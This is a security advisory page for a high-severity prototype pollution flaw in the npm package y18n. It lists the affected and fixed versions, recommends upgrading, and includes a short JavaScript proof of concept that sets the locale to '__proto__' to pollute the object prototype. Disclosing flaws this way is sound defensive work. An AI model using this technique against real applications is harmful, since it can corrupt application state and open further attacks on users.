[NPM:GHSA-C4W7-XM78-47VH] Prototype Pollution in y18n

Severity High
Affected Packages 3
Fixed Packages 3
CVEs 1

Overview

The npm package y18n before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution.

POC

```js
const y18n = require('y18n')();

y18n.setLocale('__proto__');
y18n.updateLocale({polluted: true});

console.log(polluted); // true
```

Recommendation

Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later.

Package Affected Version
pkg:npm/y18n >= 5.0.0, < 5.0.5
pkg:npm/y18n = 4.0.0
pkg:npm/y18n < 3.2.2
Package Fixed Version
pkg:npm/y18n = 5.0.5
pkg:npm/y18n = 4.0.1
pkg:npm/y18n = 3.2.2
Type Package URL Namespace Name / Product Version Distribution / Platform Arch Patch / Fix
Affected pkg:npm/y18n y18n >= 5.0.0 < 5.0.5
Fixed pkg:npm/y18n y18n = 5.0.5
Affected pkg:npm/y18n y18n = 4.0.0
Fixed pkg:npm/y18n y18n = 4.0.1
Affected pkg:npm/y18n y18n < 3.2.2
Fixed pkg:npm/y18n y18n = 3.2.2
# CVE Description CVSS EPSS EPSS Trend (30 days) Affected Products Weaknesses Security Advisories Exploits PoC Pubblication Date Modification Date
# CVE Description CVSS EPSS EPSS Trend (30 days) Affected Products Weaknesses Security Advisories PoC Pubblication Date Modification Date
Loading...